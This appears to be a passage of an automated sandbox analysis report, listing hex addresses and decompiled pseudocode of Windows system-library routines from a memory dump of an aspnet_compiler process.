                          0x00000000
                          0x00000000
                          0x0142284e
                          0x01422850
                          0x01422851
                          0x01422854
                          0x01422857
                          0x0142285a
                          0x0142285c
                          0x0142285d
                          0x00000000
                          0x00000000
                          0x0142275d
                          0x01422761
                          0x00000000
                          0x01422767
                          0x0142276e
                          0x01422773
                          0x01422773
                          0x01422776
                          0x01422778
                          0x0142277e
                          0x0142277e
                          0x01422781
                          0x01422781
                          0x01422783
                          0x01422784
                          0x00000000
                          0x00000000
                          0x01465bd8
                          0x01465bde
                          0x01465be4
                          0x01465be6
                          0x01465be8
                          0x01465be9
                          0x01465bee
                          0x01465bf8
                          0x01465bff
                          0x01465c01
                          0x01465c04
                          0x01465c07
                          0x01465c0b
                          0x01465c0d
                          0x01465c0d
                          0x01465c15
                          0x01465c18
                          0x01465c1b
                          0x01465c1b
                          0x01465c1e
                          0x00000000
                          0x00000000
                          0x014228c3
                          0x014228c8
                          0x014228d2
                          0x014228d4
                          0x014228d8
                          0x014228db
                          0x01465c26
                          0x01465c28
                          0x01465c2d
                          0x01465c2d
                          0x00000000
                          0x00000000
                          0x01465c34
                          0x01465c36
                          0x01465c49
                          0x01465c4e
                          0x01465c54
                          0x01465c5b
                          0x01465c5d
                          0x01465c60
                          0x01422788
                          0x01422788
                          0x0142278b
                          0x0142278e
                          0x0142278e
                          0x0142278e
                          0x01422791
                          0x00000000
                          0x00000000
                          0x01422756
                          0x01422750
                          0x00000000
                          0x01422794
                          0x01422794
                          0x01422795
                          0x01422798
                          0x01422798
                          0x00000000
                          0x01422734
                          0x0142272c
                          0x01422700
                          0x014225ef
                          0x014225ef
                          0x014225ef
                          0x014225f2
                          0x014225f8
                          0x00000000
                          0x00000000
                          0x014225fe
                          0x00000000
                          0x014228e6
                          0x014228ec
                          0x014228ef
                          0x014228f5
                          0x014228f8
                          0x014228f8
                          0x00000000
                          0x014228f8
                          0x00000000
                          0x00000000
                          0x01422866
                          0x01422866
                          0x01422876
                          0x01422879
                          0x00000000
                          0x00000000
                          0x014227e0
                          0x014227e7
                          0x014227e9
                          0x014227eb
                          0x01465afd
                          0x00000000
                          0x01465afd
                          0x00000000
                          0x00000000
                          0x01422633
                          0x01422638
                          0x0142263b
                          0x0142263c
                          0x0142263e
                          0x01422640
                          0x01422642
                          0x01422647
                          0x01422649
                          0x0142264e
                          0x01422650
                          0x01422653
                          0x01422659
                          0x014226a2
                          0x014226a7
                          0x014226ac
                          0x014226b2
                          0x01465b11
                          0x01465b15
                          0x01465b17
                          0x00000000
                          0x014226b8
                          0x014226b8
                          0x014226ba
                          0x014227a6
                          0x014227a6
                          0x014227a9
                          0x014227ab
                          0x014227b9
                          0x014227b9
                          0x014227be
                          0x014227c1
                          0x014227c3
                          0x014227c5
                          0x014227c7
                          0x01465c74
                          0x01465c79
                          0x01465c79
                          0x014227c7
                          0x00000000
                          0x014226c0
                          0x014226c0
                          0x014226c3
                          0x014226c6
                          0x014226c6
                          0x014226c9
                          0x014226c9
                          0x00000000
                          0x014226c9
                          0x014226ba
                          0x0142265b
                          0x0142265b
                          0x0142265e
                          0x01422667
                          0x0142266d
                          0x01422677
                          0x0142267c
                          0x0142267f
                          0x01422681
                          0x01465b49
                          0x01465b4e
                          0x014227cd
                          0x014227d0
                          0x014227d1
                          0x014227d2
                          0x014227d4
                          0x014227dd
                          0x01422687
                          0x01422687
                          0x0142268a
                          0x0142268b
                          0x0142268e
                          0x0142268f
                          0x01422691
                          0x01422696
                          0x01422698
                          0x0142269d
                          0x0142269f
                          0x00000000
                          0x0142269f
                          0x01422681
                          0x00000000
                          0x00000000
                          0x01422846
                          0x00000000
                          0x00000000
                          0x01422605
                          0x0142260a
                          0x0142260c
                          0x01422611
                          0x01422616
                          0x01422619
                          0x01422619
                          0x0142261e
                          0x00000000
                          0x01422624
                          0x01422627
                          0x01422627
                          0x00000000
                          0x00000000
                          0x01465b1f
                          0x00000000
                          0x00000000
                          0x01422894
                          0x0142289b
                          0x0142289d
                          0x014228a1
                          0x01465b2b
                          0x01465b2e
                          0x01465b2e
                          0x014228a7
                          0x014228a9
                          0x01465b04
                          0x01465b09
                          0x01465b09
                          0x01465b09
                          0x00000000
                          0x00000000
                          0x01465b35
                          0x01465b3c
                          0x014228fb
                          0x014228fb
                          0x014226cc
                          0x014226cc
                          0x014226d0
                          0x00000000
                          0x014226d2
                          0x014226d2
                          0x00000000
                          0x014226d2
                          0x00000000
                          0x00000000
                          0x014225fe
                          0x0142292d
                          0x0142292f
                          0x01422930
                          0x01422935
                          0x01422938
                          0x0142293c
                          0x0142293e
                          0x01422940
                          0x01422944
                          0x01422947
                          0x01422948
                          0x0142294e
                          0x01422950
                          0x01422958
                          0x0142295a
                          0x0142295d
                          0x01422960
                          0x01422962
                          0x01422963
                          0x01422964
                          0x01422966
                          0x0142296a
                          0x0142296e
                          0x01422972
                          0x01422973
                          0x01422974
                          0x0142297b
                          0x0142297c
                          0x0142297e
                          0x0142297f
                          0x01422980
                          0x01422981
                          0x01422982
                          0x01422983
                          0x01422984
                          0x01422985
                          0x01422986
                          0x01422987
                          0x01422988
                          0x01422989
                          0x0142298a
                          0x0142298b
                          0x0142298c
                          0x0142298d
                          0x0142298e
                          0x0142298f
                          0x01422990
                          0x01422992
                          0x01422997
                          0x014229a3
                          0x014229a6
                          0x014229ab
                          0x014229ad
                          0x014229b0
                          0x014229b2
                          0x01465c80
                          0x014229b8
                          0x014229b8
                          0x014229bb
                          0x014229c0
                          0x014229c5
                          0x014229c6
                          0x014229c6
                          0x014229c9
                          0x014229cb
                          0x00000000
                          0x00000000
                          0x014229cd
                          0x014229d0
                          0x014229d9
                          0x014229db
                          0x014229dd
                          0x01422a7f
                          0x01422a84
                          0x01422a87
                          0x01422a89
                          0x01465ca1
                          0x01465ca3
                          0x00000000
                          0x01422a8f
                          0x01422a8f
                          0x00000000
                          0x01422a8f
                          0x00000000
                          0x014229e3
                          0x014229e3
                          0x014229e3
                          0x00000000
                          0x014229e3
                          0x014229dd
                          0x00000000
                          0x014229db
                          0x014229e6
                          0x014229e9
                          0x014229eb
                          0x014229ed
                          0x014229f3
                          0x014229f5
                          0x014229f8
                          0x014229fa
                          0x01422a97
                          0x01422a9a
                          0x01422a9d
                          0x01422add
                          0x00000000
                          0x01422a9f
                          0x01422aa2
                          0x01422aa5
                          0x01422aa8
                          0x01422aab
                          0x01465cab
                          0x01465caf
                          0x01465cc5
                          0x01465cda
                          0x01465cdc
                          0x01465cdf
                          0x01465ce5
                          0x00000000
                          0x01465ceb
                          0x01465ced
                          0x01465cee
                          0x00000000
                          0x01465cee
                          0x01465cb1
                          0x01465cb4
                          0x01465cb9
                          0x01465cbb
                          0x00000000
                          0x01465cbd
                          0x01465cbd
                          0x00000000
                          0x01465cbd
                          0x01465cbb
                          0x01422ab1
                          0x01422ab1
                          0x01422ac4
                          0x01422ac6
                          0x01422ac6
                          0x00000000
                          0x01422ac6
                          0x01422aab
                          0x00000000
                          0x01422a00
                          0x01422a09
                          0x01422a0e
                          0x01422a21
                          0x01422a24
                          0x01422a35
                          0x01422a3a
                          0x01422a3d
                          0x01422a42
                          0x01422a59
                          0x01422a59
                          0x01422a5c
                          0x01422a5f
                          0x01422a5f
                          0x014229fa
                          0x014229f3
                          0x01422a64
                          0x01422a64
                          0x01422a6b
                          0x01422a6b
                          0x01422a6d
                          0x01422a72
                          0x01422a72
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: PATH
                          • API String ID: 0-1036084923
                          • Opcode ID: e26a3f44f6a408816e30eb1cb87dd6d8d0307b86c3ad9184a1d36adb7bbb3bfd
                          • Instruction ID: 98befb4315d9af9507931891d5860594b00960ccd6abf176cc3a77f0a650cdb8
                          • Opcode Fuzzy Hash: e26a3f44f6a408816e30eb1cb87dd6d8d0307b86c3ad9184a1d36adb7bbb3bfd
                          • Instruction Fuzzy Hash: 0FC19071E00229DBDB25DF99D880FAEBBB5FF58740F44402AE505AB370D774A982CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 80%
                          			E0142FAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
                          				char _v5;
                          				signed int _v8;
                          				signed int _v12;
                          				char _v16;
                          				char _v17;
                          				char _v20;
                          				signed int _v24;
                          				char _v28;
                          				char _v32;
                          				signed int _v40;
                          				void* __ecx;
                          				void* __edi;
                          				void* __ebp;
                          				signed int _t73;
                          				intOrPtr* _t75;
                          				signed int _t77;
                          				signed int _t79;
                          				signed int _t81;
                          				intOrPtr _t83;
                          				intOrPtr _t85;
                          				intOrPtr _t86;
                          				signed int _t91;
                          				signed int _t94;
                          				signed int _t95;
                          				signed int _t96;
                          				signed int _t106;
                          				signed int _t108;
                          				signed int _t114;
                          				signed int _t116;
                          				signed int _t118;
                          				signed int _t122;
                          				signed int _t123;
                          				void* _t129;
                          				signed int _t130;
                          				void* _t132;
                          				intOrPtr* _t134;
                          				signed int _t138;
                          				signed int _t141;
                          				signed int _t147;
                          				intOrPtr _t153;
                          				signed int _t154;
                          				signed int _t155;
                          				signed int _t170;
                          				void* _t174;
                          				signed int _t176;
                          				signed int _t177;
                          
                          				_t129 = __ebx;
                          				_push(_t132);
                          				_push(__esi);
                          				_t174 = _t132;
                          				_t73 =  !( *( *(_t174 + 0x18)));
                          				if(_t73 >= 0) {
                          					L5:
                          					return _t73;
                          				} else {
                          					E0140EEF0(0x14e7b60);
                          					_t134 =  *0x14e7b84; // 0x776f7b80
                          					_t2 = _t174 + 0x24; // 0x24
                          					_t75 = _t2;
                          					if( *_t134 != 0x14e7b80) {
                          						_push(3);
                          						asm("int 0x29");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						asm("int3");
                          						_push(0x14e7b60);
                          						_t170 = _v8;
                          						_v28 = 0;
                          						_v40 = 0;
                          						_v24 = 0;
                          						_v17 = 0;
                          						_v32 = 0;
                          						__eflags = _t170 & 0xffff7cf2;
                          						if((_t170 & 0xffff7cf2) != 0) {
                          							L43:
                          							_t77 = 0xc000000d;
                          						} else {
                          							_t79 = _t170 & 0x0000000c;
                          							__eflags = _t79;
                          							if(_t79 != 0) {
                          								__eflags = _t79 - 0xc;
                          								if(_t79 == 0xc) {
                          									goto L43;
                          								} else {
                          									goto L9;
                          								}
                          							} else {
                          								_t170 = _t170 | 0x00000008;
                          								__eflags = _t170;
                          								L9:
                          								_t81 = _t170 & 0x00000300;
                          								__eflags = _t81 - 0x300;
                          								if(_t81 == 0x300) {
                          									goto L43;
                          								} else {
                          									_t138 = _t170 & 0x00000001;
                          									__eflags = _t138;
                          									_v24 = _t138;
                          									if(_t138 != 0) {
                          										__eflags = _t81;
                          										if(_t81 != 0) {
                          											goto L43;
                          										} else {
                          											goto L11;
                          										}
                          									} else {
                          										L11:
                          										_push(_t129);
                          										_t77 = E01406D90( &_v20);
                          										_t130 = _t77;
                          										__eflags = _t130;
                          										if(_t130 >= 0) {
                          											_push(_t174);
                          											__eflags = _t170 & 0x00000301;
                          											if((_t170 & 0x00000301) == 0) {
                          												_t176 = _a8;
                          												__eflags = _t176;
                          												if(__eflags == 0) {
                          													L64:
                          													_t83 =  *[fs:0x18];
                          													_t177 = 0;
                          													__eflags =  *(_t83 + 0xfb8);
                          													if( *(_t83 + 0xfb8) != 0) {
                          														E014076E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
                          														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
                          													}
                          													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
                          													goto L15;
                          												} else {
                          													asm("sbb edx, edx");
                          													_t114 = E01498938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
                          													__eflags = _t114;
                          													if(_t114 < 0) {
                          														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
                          														E013FB150();
                          													}
                          													_t116 = E01496D81(_t176,  &_v16);
                          													__eflags = _t116;
                          													if(_t116 >= 0) {
                          														__eflags = _v16 - 2;
                          														if(_v16 < 2) {
                          															L56:
                          															_t118 = E014075CE(_v20, 5, 0);
                          															__eflags = _t118;
                          															if(_t118 < 0) {
                          																L67:
                          																_t130 = 0xc0000017;
                          																goto L32;
                          															} else {
                          																__eflags = _v12;
                          																if(_v12 == 0) {
                          																	goto L67;
                          																} else {
                          																	_t153 =  *0x14e8638; // 0x0
                          																	_t122 = L014038A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
                          																	_t154 = _v12;
                          																	_t130 = _t122;
                          																	__eflags = _t130;
                          																	if(_t130 >= 0) {
                          																		_t123 =  *(_t154 + 4) & 0x0000ffff;
                          																		__eflags = _t123;
                          																		if(_t123 != 0) {
                          																			_t155 = _a12;
                          																			__eflags = _t155;
                          																			if(_t155 != 0) {
                          																				 *_t155 = _t123;
                          																			}
                          																			goto L64;
                          																		} else {
                          																			E014076E2(_t154);
                          																			goto L41;
                          																		}
                          																	} else {
                          																		E014076E2(_t154);
                          																		_t177 = 0;
                          																		goto L18;
                          																	}
                          																}
                          															}
                          														} else {
                          															__eflags =  *_t176;
                          															if( *_t176 != 0) {
                          																goto L56;
                          															} else {
                          																__eflags =  *(_t176 + 2);
                          																if( *(_t176 + 2) == 0) {
                          																	goto L64;
                          																} else {
                          																	goto L56;
                          																}
                          															}
                          														}
                          													} else {
                          														_t130 = 0xc000000d;
                          														goto L32;
                          													}
                          												}
                          												goto L35;
                          											} else {
                          												__eflags = _a8;
                          												if(_a8 != 0) {
                          													_t77 = 0xc000000d;
                          												} else {
                          													_v5 = 1;
                          													L0142FCE3(_v20, _t170);
                          													_t177 = 0;
                          													__eflags = 0;
                          													L15:
                          													_t85 =  *[fs:0x18];
                          													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
                          													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
                          														L18:
                          														__eflags = _t130;
                          														if(_t130 != 0) {
                          															goto L32;
                          														} else {
                          															__eflags = _v5 - _t130;
                          															if(_v5 == _t130) {
                          																goto L32;
                          															} else {
                          																_t86 =  *[fs:0x18];
                          																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
                          																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
                          																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
                          																}
                          																__eflags = _t177;
                          																if(_t177 == 0) {
                          																	L31:
                          																	__eflags = 0;
                          																	L014070F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
                          																	goto L32;
                          																} else {
                          																	__eflags = _v24;
                          																	_t91 =  *(_t177 + 0x20);
                          																	if(_v24 != 0) {
                          																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
                          																		goto L31;
                          																	} else {
                          																		_t141 = _t91 & 0x00000040;
                          																		__eflags = _t170 & 0x00000100;
                          																		if((_t170 & 0x00000100) == 0) {
                          																			__eflags = _t141;
                          																			if(_t141 == 0) {
                          																				L74:
                          																				_t94 = _t91 & 0xfffffffd | 0x00000004;
                          																				goto L27;
                          																			} else {
                          																				_t177 = E0142FD22(_t177);
                          																				__eflags = _t177;
                          																				if(_t177 == 0) {
                          																					goto L42;
                          																				} else {
                          																					_t130 = E0142FD9B(_t177, 0, 4);
                          																					__eflags = _t130;
                          																					if(_t130 != 0) {
                          																						goto L42;
                          																					} else {
                          																						_t68 = _t177 + 0x20;
                          																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
                          																						__eflags =  *_t68;
                          																						_t91 =  *(_t177 + 0x20);
                          																						goto L74;
                          																					}
                          																				}
                          																			}
                          																			goto L35;
                          																		} else {
                          																			__eflags = _t141;
                          																			if(_t141 != 0) {
                          																				_t177 = E0142FD22(_t177);
                          																				__eflags = _t177;
                          																				if(_t177 == 0) {
                          																					L42:
                          																					_t77 = 0xc0000001;
                          																					goto L33;
                          																				} else {
                          																					_t130 = E0142FD9B(_t177, 0, 4);
                          																					__eflags = _t130;
                          																					if(_t130 != 0) {
                          																						goto L42;
                          																					} else {
                          																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
                          																						_t91 =  *(_t177 + 0x20);
                          																						goto L26;
                          																					}
                          																				}
                          																				goto L35;
                          																			} else {
                          																				L26:
                          																				_t94 = _t91 & 0xfffffffb | 0x00000002;
                          																				__eflags = _t94;
                          																				L27:
                          																				 *(_t177 + 0x20) = _t94;
                          																				__eflags = _t170 & 0x00008000;
                          																				if((_t170 & 0x00008000) != 0) {
                          																					_t95 = _a12;
                          																					__eflags = _t95;
                          																					if(_t95 != 0) {
                          																						_t96 =  *_t95;
                          																						__eflags = _t96;
                          																						if(_t96 != 0) {
                          																							 *((short*)(_t177 + 0x22)) = 0;
                          																							_t40 = _t177 + 0x20;
                          																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
                          																							__eflags =  *_t40;
                          																						}
                          																					}
                          																				}
                          																				goto L31;
                          																			}
                          																		}
                          																	}
                          																}
                          															}
                          														}
                          													} else {
                          														_t147 =  *( *[fs:0x18] + 0xfc0);
                          														_t106 =  *(_t147 + 0x20);
                          														__eflags = _t106 & 0x00000040;
                          														if((_t106 & 0x00000040) != 0) {
                          															_t147 = E0142FD22(_t147);
                          															__eflags = _t147;
                          															if(_t147 == 0) {
                          																L41:
                          																_t130 = 0xc0000001;
                          																L32:
                          																_t77 = _t130;
                          																goto L33;
                          															} else {
                          																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
                          																_t106 =  *(_t147 + 0x20);
                          																goto L17;
                          															}
                          															goto L35;
                          														} else {
                          															L17:
                          															_t108 = _t106 | 0x00000080;
                          															__eflags = _t108;
                          															 *(_t147 + 0x20) = _t108;
                          															 *( *[fs:0x18] + 0xfc0) = _t147;
                          															goto L18;
                          														}
                          													}
                          												}
                          											}
                          											L33:
                          										}
                          									}
                          								}
                          							}
                          						}
                          						L35:
                          						return _t77;
                          					} else {
                          						 *_t75 = 0x14e7b80;
                          						 *((intOrPtr*)(_t75 + 4)) = _t134;
                          						 *_t134 = _t75;
                          						 *0x14e7b84 = _t75;
                          						_t73 = E0140EB70(_t134, 0x14e7b60);
                          						if( *0x14e7b20 != 0) {
                          							_t73 =  *( *[fs:0x30] + 0xc);
                          							if( *((char*)(_t73 + 0x28)) == 0) {
                          								_t73 = E0140FF60( *0x14e7b20);
                          							}
                          						}
                          						goto L5;
                          					}
                          				}
                          			}

















































                          0x0142fab0
                          0x0142fab2
                          0x0142fab3
                          0x0142fab4
                          0x0142fabc
                          0x0142fac0
                          0x0142fb14
                          0x0142fb17
                          0x0142fac2
                          0x0142fac8
                          0x0142facd
                          0x0142fad3
                          0x0142fad3
                          0x0142fadd
                          0x0142fb18
                          0x0142fb1b
                          0x0142fb1d
                          0x0142fb1e
                          0x0142fb1f
                          0x0142fb20
                          0x0142fb21
                          0x0142fb22
                          0x0142fb23
                          0x0142fb24
                          0x0142fb25
                          0x0142fb26
                          0x0142fb27
                          0x0142fb28
                          0x0142fb29
                          0x0142fb2a
                          0x0142fb2b
                          0x0142fb2c
                          0x0142fb2d
                          0x0142fb2e
                          0x0142fb2f
                          0x0142fb3a
                          0x0142fb3b
                          0x0142fb3e
                          0x0142fb41
                          0x0142fb44
                          0x0142fb47
                          0x0142fb4a
                          0x0142fb4d
                          0x0142fb53
                          0x0146bdcb
                          0x0146bdcb
                          0x0142fb59
                          0x0142fb5b
                          0x0142fb5b
                          0x0142fb5e
                          0x0146bdd5
                          0x0146bdd8
                          0x00000000
                          0x0146bdda
                          0x00000000
                          0x0146bdda
                          0x0142fb64
                          0x0142fb64
                          0x0142fb64
                          0x0142fb67
                          0x0142fb6e
                          0x0142fb70
                          0x0142fb72
                          0x00000000
                          0x0142fb78
                          0x0142fb7a
                          0x0142fb7a
                          0x0142fb7d
                          0x0142fb80
                          0x0146bddf
                          0x0146bde1
                          0x00000000
                          0x0146bde3
                          0x00000000
                          0x0146bde3
                          0x0142fb86
                          0x0142fb86
                          0x0142fb86
                          0x0142fb8b
                          0x0142fb90
                          0x0142fb92
                          0x0142fb94
                          0x0142fb9a
                          0x0142fb9b
                          0x0142fba1
                          0x0146bde8
                          0x0146bdeb
                          0x0146bded
                          0x0146beb5
                          0x0146beb5
                          0x0146bebb
                          0x0146bebd
                          0x0146bec3
                          0x0146bed2
                          0x0146bedd
                          0x0146bedd
                          0x0146beed
                          0x00000000
                          0x0146bdf3
                          0x0146bdfe
                          0x0146be06
                          0x0146be0b
                          0x0146be0d
                          0x0146be0f
                          0x0146be14
                          0x0146be19
                          0x0146be20
                          0x0146be25
                          0x0146be27
                          0x0146be35
                          0x0146be39
                          0x0146be46
                          0x0146be4f
                          0x0146be54
                          0x0146be56
                          0x0146bef8
                          0x0146bef8
                          0x00000000
                          0x0146be5c
                          0x0146be5c
                          0x0146be60
                          0x00000000
                          0x0146be66
                          0x0146be66
                          0x0146be7f
                          0x0146be84
                          0x0146be87
                          0x0146be89
                          0x0146be8b
                          0x0146be99
                          0x0146be9d
                          0x0146bea0
                          0x0146beac
                          0x0146beaf
                          0x0146beb1
                          0x0146beb3
                          0x0146beb3
                          0x00000000
                          0x0146bea2
                          0x0146bea2
                          0x00000000
                          0x0146bea2
                          0x0146be8d
                          0x0146be8d
                          0x0146be92
                          0x00000000
                          0x0146be92
                          0x0146be8b
                          0x0146be60
                          0x0146be3b
                          0x0146be3b
                          0x0146be3e
                          0x00000000
                          0x0146be40
                          0x0146be40
                          0x0146be44
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0146be44
                          0x0146be3e
                          0x0146be29
                          0x0146be29
                          0x00000000
                          0x0146be29
                          0x0146be27
                          0x00000000
                          0x0142fba7
                          0x0142fba7
                          0x0142fbab
                          0x0146bf02
                          0x0142fbb1
                          0x0142fbb1
                          0x0142fbb8
                          0x0142fbbd
                          0x0142fbbd
                          0x0142fbbf
                          0x0142fbbf
                          0x0142fbc5
                          0x0142fbcb
                          0x0142fbf8
                          0x0142fbf8
                          0x0142fbfa
                          0x00000000
                          0x0142fc00
                          0x0142fc00
                          0x0142fc03
                          0x00000000
                          0x0142fc09
                          0x0142fc09
                          0x0142fc0f
                          0x0142fc15
                          0x0142fc23
                          0x0142fc23
                          0x0142fc25
                          0x0142fc27
                          0x0142fc75
                          0x0142fc7c
                          0x0142fc84
                          0x00000000
                          0x0142fc29
                          0x0142fc29
                          0x0142fc2d
                          0x0142fc30
                          0x0146bf0f
                          0x00000000
                          0x0142fc36
                          0x0142fc38
                          0x0142fc3b
                          0x0142fc41
                          0x0146bf17
                          0x0146bf19
                          0x0146bf48
                          0x0146bf4b
                          0x00000000
                          0x0146bf1b
                          0x0146bf22
                          0x0146bf24
                          0x0146bf26
                          0x00000000
                          0x0146bf2c
                          0x0146bf37
                          0x0146bf39
                          0x0146bf3b
                          0x00000000
                          0x0146bf41
                          0x0146bf41
                          0x0146bf41
                          0x0146bf41
                          0x0146bf45
                          0x00000000
                          0x0146bf45
                          0x0146bf3b
                          0x0146bf26
                          0x00000000
                          0x0142fc47
                          0x0142fc47
                          0x0142fc49
                          0x0142fcb2
                          0x0142fcb4
                          0x0142fcb6
                          0x0142fcdc
                          0x0142fcdc
                          0x00000000
                          0x0142fcb8
                          0x0142fcc3
                          0x0142fcc5
                          0x0142fcc7
                          0x00000000
                          0x0142fcc9
                          0x0142fcc9
                          0x0142fccd
                          0x00000000
                          0x0142fccd
                          0x0142fcc7
                          0x00000000
                          0x0142fc4b
                          0x0142fc4b
                          0x0142fc4e
                          0x0142fc4e
                          0x0142fc51
                          0x0142fc51
                          0x0142fc54
                          0x0142fc5a
                          0x0142fc5c
                          0x0142fc5f
                          0x0142fc61
                          0x0142fc63
                          0x0142fc65
                          0x0142fc67
                          0x0142fc6e
                          0x0142fc72
                          0x0142fc72
                          0x0142fc72
                          0x0142fc72
                          0x0142fc67
                          0x0142fc61
                          0x00000000
                          0x0142fc5a
                          0x0142fc49
                          0x0142fc41
                          0x0142fc30
                          0x0142fc27
                          0x0142fc03
                          0x0142fbcd
                          0x0142fbd3
                          0x0142fbd9
                          0x0142fbdc
                          0x0142fbde
                          0x0142fc99
                          0x0142fc9b
                          0x0142fc9d
                          0x0142fcd5
                          0x0142fcd5
                          0x0142fc89
                          0x0142fc89
                          0x00000000
                          0x0142fc9f
                          0x0142fc9f
                          0x0142fca3
                          0x00000000
                          0x0142fca3
                          0x00000000
                          0x0142fbe4
                          0x0142fbe4
                          0x0142fbe4
                          0x0142fbe4
                          0x0142fbe9
                          0x0142fbf2
                          0x00000000
                          0x0142fbf2
                          0x0142fbde
                          0x0142fbcb
                          0x0142fbab
                          0x0142fc8b
                          0x0142fc8b
                          0x0142fc8c
                          0x0142fb80
                          0x0142fb72
                          0x0142fb5e
                          0x0142fc8d
                          0x0142fc91
                          0x0142fadf
                          0x0142fadf
                          0x0142fae1
                          0x0142fae4
                          0x0142fae7
                          0x0142faec
                          0x0142faf8
                          0x0142fb00
                          0x0142fb07
                          0x0142fb0f
                          0x0142fb0f
                          0x0142fb07
                          0x00000000
                          0x0142faf8
                          0x0142fadd

                          Strings
                          • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 0146BE0F
                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                          • API String ID: 0-865735534
                          • Opcode ID: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                          • Instruction ID: 173cc638212b865c8e3532b36dd47540e4c8d7ac6135d4cc615cadd8cadcb3d5
                          • Opcode Fuzzy Hash: bf2de46a6aecb13c719af4c9f7883d2e21b2b1b47626b2d370133bae593cf384
                          • Instruction Fuzzy Hash: AFA10671B006168BEB26CB6AC45076AB7B8FF54624F84456FD906CB7B1DB30D886CB81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 63%
                          			E013F2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
                          				signed char _v8;
                          				signed int _v12;
                          				signed int _v16;
                          				signed int _v20;
                          				signed int _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				signed int _v52;
                          				void* __esi;
                          				void* __ebp;
                          				intOrPtr _t55;
                          				signed int _t57;
                          				signed int _t58;
                          				char* _t62;
                          				signed char* _t63;
                          				signed char* _t64;
                          				signed int _t67;
                          				signed int _t72;
                          				signed int _t77;
                          				signed int _t78;
                          				signed int _t88;
                          				intOrPtr _t89;
                          				signed char _t93;
                          				signed int _t97;
                          				signed int _t98;
                          				signed int _t102;
                          				signed int _t103;
                          				intOrPtr _t104;
                          				signed int _t105;
                          				signed int _t106;
                          				signed char _t109;
                          				signed int _t111;
                          				void* _t116;
                          
                          				_t102 = __edi;
                          				_t97 = __edx;
                          				_v12 = _v12 & 0x00000000;
                          				_t55 =  *[fs:0x18];
                          				_t109 = __ecx;
                          				_v8 = __edx;
                          				_t86 = 0;
                          				_v32 = _t55;
                          				_v24 = 0;
                          				_push(__edi);
                          				if(__ecx == 0x14e5350) {
                          					_t86 = 1;
                          					_v24 = 1;
                          					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
                          				}
                          				_t103 = _t102 | 0xffffffff;
                          				if( *0x14e7bc8 != 0) {
                          					_push(0xc000004b);
                          					_push(_t103);
                          					E014397C0();
                          				}
                          				if( *0x14e79c4 != 0) {
                          					_t57 = 0;
                          				} else {
                          					_t57 = 0x14e79c8;
                          				}
                          				_v16 = _t57;
                          				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
                          					_t93 = _t109;
                          					L23();
                          				}
                          				_t58 =  *_t109;
                          				if(_t58 == _t103) {
                          					__eflags =  *(_t109 + 0x14) & 0x01000000;
                          					_t58 = _t103;
                          					if(__eflags == 0) {
                          						_t93 = _t109;
                          						E01421624(_t86, __eflags);
                          						_t58 =  *_t109;
                          					}
                          				}
                          				_v20 = _v20 & 0x00000000;
                          				if(_t58 != _t103) {
                          					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
                          				}
                          				_t104 =  *((intOrPtr*)(_t109 + 0x10));
                          				_t88 = _v16;
                          				_v28 = _t104;
                          				L9:
                          				while(1) {
                          					if(E01417D50() != 0) {
                          						_t62 = ( *[fs:0x30])[0x50] + 0x228;
                          					} else {
                          						_t62 = 0x7ffe0382;
                          					}
                          					if( *_t62 != 0) {
                          						_t63 =  *[fs:0x30];
                          						__eflags = _t63[0x240] & 0x00000002;
                          						if((_t63[0x240] & 0x00000002) != 0) {
                          							_t93 = _t109;
                          							E0148FE87(_t93);
                          						}
                          					}
                          					if(_t104 != 0xffffffff) {
                          						_push(_t88);
                          						_push(0);
                          						_push(_t104);
